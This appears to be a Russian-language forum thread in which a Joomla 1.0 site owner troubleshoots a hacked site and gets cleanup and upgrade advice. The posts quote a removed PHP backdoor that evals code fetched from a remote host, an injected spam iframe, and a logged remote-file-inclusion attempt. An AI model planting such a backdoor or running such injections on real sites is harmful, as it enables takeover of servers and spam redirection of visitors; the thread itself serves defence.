Joomla 1.0 имядомена/?id=xxxxx страницы с iframe

Стоит joomla 1.0.8.2 перешел ровно месяц назад с mamba т.к. очень часто атаковали хаккеры, поменял уязвимые компоненты, снес лишние...

Собственно с сайтом все ок
Но обнаружил в логах заходы поисковиков по адресам имядомена/?id=xxxxx
По этим адресам идет чистый дор вначале вызывается <iframe src="http://googleloh.com/com/in.cgi?2&group=ph&parameter=valium+necklace+pendant&said=0711afisha" border=0 width="100%" height="100%"></iframe> дальше идет сам код странички

Шаблоны чистые, index.php в корне чистый (удалил код <?php if(isset($_GET['id'])) {
@eval(@file_get_contents('http://beliy.us/server/index1.php?host='.$_SERVER['SERVER_NAME'].'&id='.$_GET['id']));
} ?>- возможно он уже давно был залит)
поотключал все папки, страница не отображается только если отключить includes/phpInputFilter/class.inputfilter.php

Сейчас остановил сайт т.к. проблема не решена.
Не пойму откуда берется сам код, из БД?

 

Скачать сайт, осуществить поиск по файлам на предмет iframe. И если уже переходить на Joomla 1.0, то на 1.0.15

 

Спасибо за быстрый ответ!!!
Нашел я, это тотже код был еще в editor/editor.php
странно дата изменения файла 2006 год, я и не обратил внимание на него

Как дальше быть, кроме установки 1,0,15 как обезапасить себя (фак читал)

 

farmpak, если саму джумлу защитили, пользуясь FAQ, то можно подумать и о хостере, часто именно его агрехи и приводят к дефеисам

 

А это что за попытки взлома?
//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.hfilm.co.kr/bbs/info/id.txt??
и таких запросов штуки 3 за день

 

Это попытки взлома, что тут еще скажешь?

 

я имел ввиду как проверить защищен ли от них сайт

 

в 1.0.15RE .htaccess имеет встроенную защиту от такого типа атак

 

sectus
Спасибо за ответ
при обновлении .htaccess не меняется же
создается htaccess.txt
Сейчас вручную исправил